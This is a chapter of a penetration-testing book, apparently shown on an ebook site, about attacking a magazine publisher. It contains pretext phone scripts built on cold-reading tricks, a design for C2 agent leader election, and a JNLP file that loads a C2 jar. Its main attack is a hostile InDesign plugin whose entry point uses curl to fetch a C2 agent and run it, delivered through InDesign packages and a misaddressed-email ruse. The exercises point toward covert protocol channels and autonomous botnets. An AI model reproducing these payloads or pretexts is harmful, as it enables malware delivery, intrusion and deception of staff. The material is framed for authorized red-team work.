Search in book...
Toggle Font Controls
Create new playlist

Name your new playlist

Playlist description (optional)
Sign In

Email address

Password

Forgot Password?

or

Continue with Facebook

Continue with Google
Sign Up

Full Name

Email address

Confirm Email Address

Password

or

Continue with Facebook

Continue with Google

Chapter 8
Hack Journalists

In this chapter I want to talk about social engineering—we've talked about it a little throughout the book but now that we're nearing the end I, want to add some depth. Rather than replicate what I've written about in the past, I'd like to discuss a new framework to approach social engineering using what stage mediums and other performers call cold reading.

Additionally, I'll introduce some emerging and extant technologies that are useful when looking for more creative ways to deliver a payload.

Finally, I'll introduce some advanced concepts in C2 agent management that will be vital to understand in an environment where you need to manage a number of agents without utilizing too much of the target's bandwidth.

Briefing

The penultimate target in this book is a major international magazine publishing house. The major concerns coming from management were that the editorial and development process were sloppy from a security perspective and that could lead to an attacker being able to modify publications prior to going to print (this attack could be motiveless mischief or something targeted by activists, and it would be equally expensive to rectify).

This publishing house, like many others, used Adobe Creative Suite tooling for virtually every part of the development process—InDesign for layout, Photoshop for imaging, etc. Again, like a lot of such businesses, they were very much an Apple house and all their people used Macs. Handy information to have.

Rather than focus on generic attacks applicable to any business, I wanted to explore a tailored approach that would attack their rich media tooling in some way, that is, to insert myself into the daily workflow of the company in such a way as to reduce any suspicion in the editing staff, who would likely be the prime targets. The attack section at the end of this chapter details how I subverted a product they used every day to download and install a C2 agent.

Advanced Concepts in Social Engineering

Social engineering is often an exercise preceded by research into a target. However, sometimes that research may not be 100 percent effective or there may be times when you have to think on your feet with little or no prep time. There are ways to obtain information from a target in such circumstances, but in order to demonstrate what I'm talking about, I first want to put it in context.

A couple of years ago, I attended a fundraising party with some friends. The host had arranged for a Tarot reader to be present. I tend to think of myself as an open-minded skeptic (sure, anything's possible but I don't believe that bits of pasteboard being pushed around a table can tell the future), but it was a fundraiser and a bit of fun, so I went along with it. One by one, the guests joined the reader in an isolated room for 15 minutes and then would (almost without exception) emerge amazed with the accuracy of the predications or life assessments that had been made. When it was my turn, it became obvious why she had wanted to do these “readings” separately: mine was highly generic and could have applied to pretty much anyone my age. In short, she was relying on a technique that is known in the industry (psychics/stage magicians, take your pick) as “cold reading.” Rather than mess with the lady, I played along, but the experience got me thinking.

Cold Reading

Cold readers use a number of methods to imply that they know much more about the subject than they actually do. As I stated, it's most commonly (but not exclusively) used in regard to “psychics” and stage performers. I thought that it would be a fun art project to learn about the Tarot while simultaneously studying everything I could find on cold reading as well watching performances by the greats in the field of mentalism. I wanted to see if there were ways that cold reading could be applied to the wider field of social engineering, specifically within penetration tests.

I've written about more traditional social engineering in Unauthorized Access, published by Wiley in 2009. These techniques are a little different; the following are examples of cold reading methods as used by stage performers adapted for use in social engineering scenarios.

The Fuzzy Fact

A fuzzy fact is a vague statement likely be accepted by the “mark” due to the way it is formulated. Following that acceptance, it allows the reader to develop the dialogue into something more specific.

A reader may say something like, “I can see a connection with Europe, possibly Britain, or it could be the warmer southern regions. This impression is quite strong; does this mean anything to you?”

If the mark answers something like, “Could this include Wales?” then the reader would expand on that by saying, “There is a definite Celtic feel to the vibrations I'm sensing.”

Using the Fuzzy Fact in Social Engineering

Getting hold of certain people or finding out who you need to talk to in order to extract information is not always straightforward. We can use the fuzzy fact technique to do just that:

“Hello, I hope you can help me. I've got a message here to return a call from someone in your company, but the handwriting of the guy who gave it to me is a nightmare. I'm not sure if it's Allan, Ali, or Anton… I can't make it out. All I know is it's to do with buying training courses in Fortify security software or sorting out training requirements. Do you have any idea who that might be?”

The cool thing about this approach is that it turns the process on itself. Reception is used to having to block calls to certain people (from salesman or recruiters usually), but that blocking process is now gone. Now it's just a conversation between two people, one who's trying to help out by returning a call promptly and someone who's job it is to help. Note that the names in this example could be first names or they could be surnames. If reception recognizes a name that is similar to one you've quoted, then you will likely be immediately connected. Otherwise:

“I can put you through to Dave Peterson, he handles that, but I can't place an Anton or an Ali.”

In which case, all you have to say is, “Peterson, that's it. I've got the wrong file in front of me. Sorry! Could you put me through so I can find out why he's calling?”

The Psychic Credit

One trick that psychics use to break down the natural skeptical resistance of their clients is to imply that they sense that the client has a naturally strong psychic vibration or talent. This can be done in a number of ways (“I see it in your aura” or whatever), but the point is to lower skepticism by treating the client as an equal and according them due respect. It's a nice trick and it works very well.

Using the Psychic Credit in Social Engineering

I'm not saying you should imply your targets have psychic powers, but a similar way of breaking down resistance when trying to extract information is to credit them with knowledge or experience they don't have. Again, by treating the target as an equal and according them the respect of a peer, they are much more likely to give you the assistance you need. You can inject things into the conversation like, “Ah, okay, I'm normally not used to dealing with people who know what they're talking about—this is a nice change!”

In the UK (and probably elsewhere), there are few things people like less than dealing with GP's (general practitioners) assistants or receptionists. I don't want to generalize, but it's practically a cliché. They try to dispense their “expertise” on prescriptions and other medical advice as though they are doctors themselves. Point this out and be prepared to get nowhere if you're trying to get an appointment with your doctor on the National Health Service. On the other hand, if you massage this kind of personality—“You're the expert so I was wondering if you could tell me….”—and you'll have a much better experience. This is not the same thing as flattery, which we cover in a bit.

The Rainbow Ruse

This is psychic's stock in trade. The Rainbow Ruse is a statement that credits the client with both a personality trait and its opposite. For example:

“You can be a very considerate person, very quick to help others even without being asked, but there are times, if you are honest, when you recognize a selfish streak in yourself.”

That's a win-win if ever there was one! The rainbow ruse allows you to make an irrefutable statement and that's social engineering gold.

Using the Rainbow Ruse in Social Engineering

This is useful if you need to appear to know more about a business or a process or an individual than you actually do. It makes for good small talk when integrated into other social engineering strategies. Consider the following:

“I was reading an article about your company just the other day. Financial Times, if I recall correctly. The biggest takeaway for me was that it was pointing out how segmented your industry can be. It was saying that with some of your competitors, there's been quite a lot of change and fluctuation—you know, restructuring, repositioning, talks of mergers—while in others things have been really very calm, just ticking over much as expected.”

Nonsense. Complete and utter nonsense, but you get the point. You can say a lot and sound convincing enough without knowing anything.

Flattery

Flattery is similar to the psychic credit, but is broader in its approach and should be approached with caution. Men are easy targets of flattery, particularly by women. On the other hand, women are (by and large) not so easily manipulated by flattery, as they are more inured against it. It's interesting to note, however, that by far, many more women see psychics and Tarot readers than men. In any case, it's a highly effective technique in psychic readings.

“You know how to be a good friend. I see that you're basically a good person, an honest person, who wants to do the right thing.”

“You're warm and loving.”

“You have a kind soul.”

“You're an independent thinker.”

This is the sort of stuff that everyone likes to hear. Of course, “psychics” have an easier time of it because they can “divine” such things without having to provide context and with the goal once again of breaking down skepticism and cultivating rapport.

Using Flattery in Social Engineering

If you're having some trouble facing off against corporate security policy while trying to acquire information, be nice and show how much you appreciate the fact that they take information security seriously:

“I have to say I think your adherence to the essence of what security really is is spot on. Getting the balance right between functional process and security is never easy, but I think you've really judged it well—probably a bit better than most companies in your sector. At least in my experience.”

This is also referred to in psychic readings as “praising the concern” or psychologically rewarding skepticism. Security personnel are only too aware of how difficult it is to balance functional process and security and will certainly appreciate someone for noticing they're doing a good job. Just don't come across as a kiss-ass.

The Jacques Statement

This is an interesting one. It is named after Jacques in Shakespeare's “As You Like It,” who gives the famous “Seven Ages of Man” speech. Most people are fundamentally the same. They have the same experiences at the same times in their lives, the same triumphs, achievements, crises, and disappointments. It doesn't matter if the client is wearing a crisp suit and a Rolex or is sporting a punk hairstyle and a studded wristband. This is why the first thing a psychic will ask you is your age.

The following example is something that would be applicable to someone in their late 30s or early 40s:

“Be honest with yourself: you have been spending a lot of time recently wondering what happened to all those dreams you had in your younger days—ambitions and plans that once mattered to you. There is a part of you that wants to just scrap everything, get out of the rut, and start over again—this time doing things your way.”

This is like telling a teenager that they are sometimes moody; it's like shooting fish in a barrel.

Using the Jacques Statement in Social Engineering

It's not just people's lives that are predictable but the lifespan of a business:

“I've been following your business since the early days—the free-for-all when it was all about grabbing market share, getting a foothold, and then it was all about consolidation. Everything's owned by HP and IBM these days isn't it? Usual story, the big fish merging into bigger fish to cut costs and squeeze margins—trying to guarantee survival, really—and just a few independents being left to cater for specialist ‘niche’ sectors.”

Statements like this can be customized as needed. They're useful for building rapport and demonstrating that the social engineer and the target are “on the same page” and have trodden the same paths.

The Barnum Statement

P.T. Barnum was a legendary showman and impresario who was said to have “something to please everybody.” As such, a Barnum Statement is one that is designed to ring true to everyone. These statements don't need to be flattering in nature. For example:

“Occasionally your hopes and goals can be pretty unrealistic.”

“You have a strong need for people to like and respect you.”

Of course, they can be flattering:

“You are an independent and original thinker; you don't just accept what people tell you to believe.”

This is another classic psychic trick to appear knowledgeable about a subject while making a statement that could be applicable to just about anybody.

Using the Barnum Statement in Social Engineering

Like the Jacques Statement, the Barnum Statement has applications far beyond people. For example:

“I was talking to an old friend of mine at InfoSec in London last week. He used to work for you guys, and he was saying that the business is there, if you know where to find it, but the problem is making it pay. Thin margins keep getting thinner, and you really have to go for the long-term to make it work. Perhaps that applies to some consultancy engagements more than others.”

C2 Part VIII: Experimental Concepts in Command and Control

So far, we have examined a number of ways in which C2 can be maintained over the target infrastructure. However, in every scenario so far—regardless of implementation—the model has has always relied on every node or agent under our control having its own C2 channel. This is not always appropriate nor wise. In a situation where you will need to control or direct a number of hosts, this will generate excessive network traffic (or at the very least, excessive beacons and therefore connections) out of the network. In such circumstances, it is worth considering an alternative model that consolidates the hosts in your C2 into a single management channel.

As you will see, this is not as easy as it sounds. There is, of course, no single “best” approach to advanced agent management, but in this chapter we will consider two possible solutions. The one you take depends largely on the circumstances of the mission and what is most appropriate given your knowledge of the architecture of the target network. However, in both cases the goal is to select one of the C2 agents as a master and channel all the data through that node.

Scenario 1: C2 Server Guided Agent Management

The easiest way to achieve this goal is to allow the C2 server to assign roles to the C2 agents. The initial agent to beacon in would be assigned the role of master, as shown in Figure 8.1.

Illustration depicting Initial beacon designated as Master node. — **Figure 8.1:** Initial beacon designated as Master node.

All subsequent beacons would receive instructions to channel traffic back through this master agent node. See Figure 8.2.

Illustration depicting C2 uses Master for outbound connectivity. — **Figure 8.2:** C2 uses Master for outbound connectivity.

How nodes communicate between each other over the local network segment is a matter of personal preference, as virtually any protocol common on internal networks can be modified or extended to include a C2 payload, ICMP, SNMP, and of course HTTPS.

These are three obvious examples in scenarios where an excessive use of internal SSH traffic between workstations may be considered suspicious by aggressive network monitoring. All will allow you to carry arbitrary data. HTTPS is not recommended for carrying C2 data outside the network, given the additional potential scrutiny this protocol will receive from border level security. However, the sky's the limit if you want to get creative and stay under the radar. I'm currently experimenting with fake RIP and OSPF messages (Intrusion Detection Systems won't meddle with internal routing protocols).

The problem with this approach is that the entire C2 infrastructure becomes dependent on one agent node. Multiple agents can be assigned in a failover scenario, but that's usually needlessly complex. A simple solution in the event that the C2 master agent dies (i.e., is discovered or the machine is switched off or rebooted) is to implement a timeout function based on a communication failure of an arbitrary period of time (see Figure 8.3).

Illustration depicting timeout on the Master node signals no longer functional or the host is switched off. — **Figure 8.3:** A timeout on the Master node signals it is likely no longer functional or the host is switched off.

At this point, the C2 server will assume that node is either temporarily or permanently disabled and will assign the role of C2 agent master to another host. It will instruct the remaining slaves to route through this new host as before (see Figure 8.4).

Illustration depicting C2 Server nominating new Master node. — **Figure 8.4:** C2 Server nominates new Master node.

Scenario 2: Semi-Autonomous C2 Agent Management

While the previous scenario is effective in most cases, there may be circumstances where you will want to grant your C2 nodes more autonomy in selecting their own master node (or nodes), depending on certain factors specific to the target environment. A simple broadcast packet or a fake ARP packet can be used to enable nodes that are not aware of each other's presence to communicate on a local network segment (see Figure 8.5).

Illustration depicting Agents nominate their own Master. — **Figure 8.5:** Agents nominate their own Master.

Once an agent master node has been assigned, C2 is initiated as per scenario 1 (see Figure 8.6).

Illustration depicting Master functions as a gateway for other nodes. — **Figure 8.6:** The Master functions as a gateway for other nodes as before.

However, the major difference is that the nodes need not wait for an agent master timeout to occur in order to conduct a new election where a new node is selected if necessary or the current one is maintained. This can occur at a predefined interval or between quiet times in C2 activity (see Figure 8.7).

Illustration depicting C2 activity. — **Figure 8.7:** Further elections are held as necessary.

Notes on the relationship between master and slave agents. The master agent has a number of responsibilities, regardless of the scenario you choose to implement:

Monitoring the state of slave hosts. If a slave host fails or becomes unreachable, the master host notifies the C2 server.
Acting as the central conduit between the C2 server and the C2 slave nodes.
Correctly routing C2 messages to C2 slave nodes without the C2 server needing to specify anything other than the slave node's identifying name (i.e., the workstation name).

A master node should not be used for initiating a new election and this responsibility continues to be shared by all hosts in the C2 infrastructure (simply because the master can die at any time).

An election algorithm need not be complex, nor should it be. Simply put, when it is decided (due to a communication failure or an exceeded period of time), an election occurs where each member of the C2 infrastructure is a voting member. Communication occurs through broadcast messages and is a point-based system. The host with the most points becomes the new master agent node. Factors influencing points can be:

Relative importance of the node. Is it a server, domain controller, or a high value asset previously indicated manually by the C2 server controller?
Previous reliability of the node as noted by uptime. Is it a box that gets switched off at 5 pm every day?
Communication reliability in general, which can be rated in several ways with a score that decreases every time a master is subject to a C2 communications failure (or, conversely, increases based on the opposite).
Random jitter to avoid stagnation.

The business of determining master/slave relationships like this is a problem that is faced by many developers in perfectly legitimate areas of software development where stealth is not a factor. It is therefore not surprising that it can be somewhat more complex from our point of view. In computer science, this problem is called leader election (not to be confused with leadership election), and there are many unique paradigms and schools of thought within it that are beyond the scope of this book, but well worth exploring.

CELEBRITY BANDIT POPPING

As a teenager, a major pastime of mine (along with a couple of notable conspirators) was prank-calling celebrities. In my defense, I grew up in southwest Wales and that's one of those places you kind of have to make your own entertainment—for my American readers, think rural Louisiana. One time we called George Takei just as he was leaving the house. Understandably he was annoyed and chided us by saying, “You can't do this, it's bandit popping.” So that became the literal name of the game. Reactions to being called at home by British kids with nothing better to do varied. Charlton Heston was the perfect gentleman when we asked him to explain the ten commandments, whereas Zsa Zsa Gabor used words I daren't hint at. One time we spent ten minutes on the phone talking to a delightful lady who denied being Leonard Nimoy's wife but we could hear him in the background saying in his very distinctive voice, “Put down the phone. Put. Down. The. Phone.”

Why am I regaling you with stories of my delinquent youth?

If you wanted to engage in such anti-social behavior today, it would probably be a lot easier to get celebrity phone numbers (ask Jennifer Lawrence how she feels about mobile security). Back then, though, there was no web, no iCloud, and certainly no smartphones. In Carmarthen in 1993, the only people who had cell phones were drug dealers. So how did we get phone numbers? It was a lot easier than you might think and employed a lot of what I would later professionally call “social engineering.”

If you look at the credits at the end of any given film, you'll note that everyone who was associated with the project is listed: caterers, hair stylists, spiritual advisers, whoever. Agents. Agents were the guys who were interesting at first because they would definitely have the numbers we wanted and after a few false starts we got very good at getting them to give numbers up. We'd misrepresent ourselves as lawyers, personal assistants, taxi firms, D-Girls. However, we soon learned that there is this whole parasitic industry in Hollywood that feeds off celebrity (or caters to it exclusively, depending on your perspective) and these people will do anything to ingratiate themselves with the stars as well as boast of their clientele. That's an easy combination to exploit. An ex-colleague of mine set up shop in LA selling “bespoke” security solutions for celebrities. He'd take a celeb's phone, wave a magic wand over it and declare it secure but at the same time he'd download the contacts so he could expand his client base. Cynical but brilliant.

If you know the right leverage to put on the right people, getting privileged information is trivial. I did learn one other important skill from all this and that's to speak in other accents. This would later evolve into my signature party trick. If you haven't seen me do Hamlet as John Wayne, you haven't fully experienced Shakespeare.

Disclaimer: Do not prank call celebrities, it's not big, it's not clever, it's not funny. Enough said.

Payload Delivery Part VIII: Miscellaneous Rich Web Content

We've talked about Java applets and touched on Adobe Flash as attack vectors. However, as Oracle has expressed a desire to replace applets in their current form and as the browser makers have lost all patience with Adobe over their complete lack of secure coding practices, neither of these technologies are going to be around forever. Their successors are already in active deployment and are suitable for use in APT modeling attacks. Although they are very different from each other technologically, the way they offer content to the user is (visually) not all that dissimilar, so it makes sense to talk about the two together.

Java Web Start

JWS applications don't run inside the browser but are generally deployed through the browser interface. From a software development perspective, this has several advantages, but mainly it allows much more refined memory management and indeed the allocation of much more memory than would normally be provided to an applet. Java Web Start is now deployed by default with the Java Runtime Environment and doesn't need to be installed separately by the user.

Rather than load a .jar file from within an HTML page, JWS uses an XML file with a .jnlp (Java Network Launching Protocol) extension. When a user clicks on the file, the .jar is loaded from the network and passed straight to the JRE for execution, which again takes place in its own frame rather than within the context of the browser window. A .jnlp file to launch a .jar from the web looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<jnlp spec="1.0+" codebase="http://c2.org/c2" href="">
    <information>
        <title>JWS APT fun!</title>
        <vendor>APT demo.</vendor>
        <offline-allowed/>
    </information>
    <resources>
        <j2se version="1.5+" href="http://java.sun.com/products/autodl/j2se"/>
        <jar href="c2.jar" main="true"/>
    </resources>
    <applet-desc name="c2 applet" main-class="c2applet.Main" width="300" height="200">
    </applet-desc>
  <update check="background"/>
</jnlp>

One of the reasons Oracle cited for moving to this model was “security”; however, as long as the referenced .jar file containing the C2 payload is code signed (see Chapter 2, as the process is identical), there is no restriction to the file system, process execution, or anything else.

Adobe AIR

Much like JWS, Adobe AIR uses existing technologies to execute content that would traditionally be executed within the browser in a standalone frame. AIR applications are cross-platform and mobile friendly. From our perspective, unlike Flash running in a web browser, AIR apps run with the same security restrictions as native applications and as such have access to an unsandboxed file system. They can start applications, access the network, and so forth. (This functionality is dramatically curtailed on mobile platforms—particularly on iOS where, as with any unjailbroken iPhone/iPad, only the local file system is accessible.)

AIR applications are created in the same way as Flash applets using the same Adobe technologies.

A Word on HTML5

HTML5 and its associated technologies are still evolving and in emergence and at present are not terribly interesting (from the perspective of APT modeling). One thing that is interesting and worthy of further study is that HTML5 permits writing content to disk, albeit to a completely sandboxed virtual file system. I mention this here solely because such things have a way of going pear shaped from a security perspective and it might be an interesting way in the future to bypass security zones. For now, it's more of a “watch this space” type of affair.

The Attack

In the briefing I stated that I wanted to attack the processes used by the editing staff in some way. The philosophy behind that being that it behooves you to learn the way your target works to create the most successful and precise attacks possible, rather than relying on generic exploits or attacks.

This attack is directed at Adobe InDesign, a complex publishing layout and editing package. Rather than look for unpublished buffer overflows or other memory corruption bugs, the goal is to create a hostile InDesign plugin and trick a user into installing it. Creating plugins for InDesign can be complex process, but this code need not be overly complicated as the goal is simply to deliver our C2 agent. Additionally, Adobe provides a complete Software Development Kit (SDK).

The targets are running OS X, so in order to create a plugin we need the following:

Adobe InDesign CS5
Apple InDesign SDK (download link)
A Mac running OS X, El Capitan
The latest version of Apple's Xcode development environment

No prior knowledge of the environment is assumed. A quick note to the reader—I don't care much for Xcode as a RAD environment. I've never found it to be the best or easiest way to create code even for its very specific intended purposes (i.e., Mac and iPhone development) and in the next chapter when we discuss creating hostile iPhone and Android code, I'll take a radical departure from it to introduce other tools. However, right now there's no getting away from it.

This template is essentially an empty InDesign plugin. It contains everything needed to build a plugin that, as it stands, will do nothing. We don't care about any of the SDK functionality beyond having a project that will successfully build. The rest of the code will be entirely generic C++ within the Xcode editor. The goal therefore is to add the necessary code to download and implement our C2 agent and ensure that this code is executed when the plugin is launched.

The command in C++ to execute an external shell command is system.

In the interests of extreme simplicity, two system calls are made—one to retrieve the C2 agent and one to execute it:

system("curl -O http://c2server/c2agent")
system("./c2agent")

This example is for clarity. I expect you to be able to do something better. I'm using curl rather than wget, as the former is installed by default in OS X, whereas the latter is not. This code is included in the SDKPluginEntrypoint.cpp file, as shown in Figure 8.8.

Screenshot for SDKPluginEntrypoint.cpp file interface. — **Figure 8.8:** The SDKPluginEntrypoint.cpp file.

#include "VCPlugInHeaders.h"
#include "PlugIn.h"
static PlugIn gPlugIn;

/** GetPlugIn
       This is the main entry point from the application to the plug-in.
       The application calls this function when the plug-in is installed
       or loaded. This function is called by name, so it must be called
       GetPlugIn, and defined as C linkage.
       @author Jeff Gehman
*/
IPlugIn* GetPlugIn()
{
       system("curl -O http://c2server/c2agent")
        system("./c2agent")
       return &gPlugIn;
}

// End, SDKPlugInEntrypoint.cpp

Now build the plugin within Xcode, as shown in Figure 8.9.

Screenshot for Xcode build menu. — **Figure 8.9:** Xcode build menu.

If all goes well, you will now have an InDesign plugin. Usually these have a .pln or .framework extension, but depending on the version of Xcode you are using, on the Mac it may not have an extension at all. Copy this plugin into a subdirectory of your InDesign plugins folder. Again this varies by version, but it's usually easily found with the Application window in Finder, as shown in Figure 8.10.

Screenshot for C2 agent extension payload interface. — **Figure 8.10:** C2 agent extension payload.

So we've got a very simple hostile plugin that we need our target to install. What should we do, simply send it to them? That's outside the workflow of this world. InDesign, being a publishing application, needs to ensure that all dependencies are met before a document is handed off from an editorial team to a printing house. For example, if a particular font is required and the printer doesn't have that font installed on their machine, there's a problem. The same if a document needs a particular plugin.

To resolve this problem, InDesign has a package functionality that can include all of the required dependencies in the handoff document. This way, if a plugin (say, for example, our C2 agent) is not available, it will be installed when the recipient opens the package. That's a one-click process within InDesign but we have a lot of options as to what to include (or indeed exclude), as shown in Figure 8.11.

Screenshot for Pre-flight packaging in InDesign. — **Figure 8.11:** Pre-flight packaging in InDesign.

The rest is social engineering. The question is who to attack, the printers or the publishers? We could pretend to be a client of the printer and send them a payload bearing InDesign document, but that will likely unravel fast.

A good strategy is the old misaddressed email ruse, as it will get the document opened but quickly dismissed when the target realizes it was not intended for them. A quick follow-up email a few minutes later, saying “Sorry—not for you!” will aid in this mental dismissal process.

Of course, given that our intention is to modify documents after the editorial process but before printing, we could go a lot further than this simple SDK example. Instead of deploying C2, we could use the SDK to find and modify documents. It contains all the functionality to automate any kind of InDesign functionality. The effectiveness of such an attack will depend on the lead time an attacker has.

Summary

The lesson from the start of this book has been that the nature of threat changes but stays the same. As technologies are phased out, new ones emerge to take their place and there is no reason to think that they will be any more secure than their predecessors. The difference between a successful attack and a failed mission is how well you understand the target, its processes, and the technologies on which it is reliant. Once you're able to follow their workflow, you will be able to discover and exploit vulnerabilities within it.

In the example of the InDesign document, it should go without saying that trusting a plugin from a third party that could do anything is a serious security vulnerability. However, most people who use InDesign will never consider this possibility, as it's just like any other InDesign plugin they encounter on a daily basis. The way they are packaged and deployed is a necessary fact of life for anyone involved in either editing and signing off on content or receiving it for printing and publication. This analogy can be extended to any business.

Exercises

Explore the various means of deploying rich content in a web browser and how these tools and technologies can be subverted to deliver attacks (both technological and social engineering based). There are many to choose from. To start with, download the free demo of Mulitmedia Fusion. Note how quickly complex content can be created using this software as well as the diverse environments it can deploy to.
Explore network protocols that are essential to the internal functioning of a network such as ARP, ICMP, RIP, and OSPF. How could these be used to carry data covertly? Start with ARP, which allows broadcast communication. This is handy, as we've seen in this chapter, but also could be used to carry data between two IP addresses on a network without the use of a broadcast.
Study the concept of leader election and how it can be leveraged in creating autonomous C2 environments. This can go well beyond the control of simple C2 agents in one target network and can be used in the creation of Internet-wide autonomous botnets.
Bonus exercise (just for fun). We talked a lot about social engineering in this chapter and one of the elements of being successful there is sounding authentic over the telephone. Assuming you're a native English speaker, learn to speak in an accent unfamiliar to you. If you speak one of the many forms of British English, Californian English is the easiest to master, so pick something like Brooklyn or Cajun—these will be more challenging. On the other hand, if you're an American, then British Received Pronunciation is hard to master, as is British West Country. Actors often need to learn another accent professionally and there are consequently plenty of courses available for such purposes.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.

Table of Contents for Chapter 8: Hack Journalists

Create new playlist

Sign In

Sign Up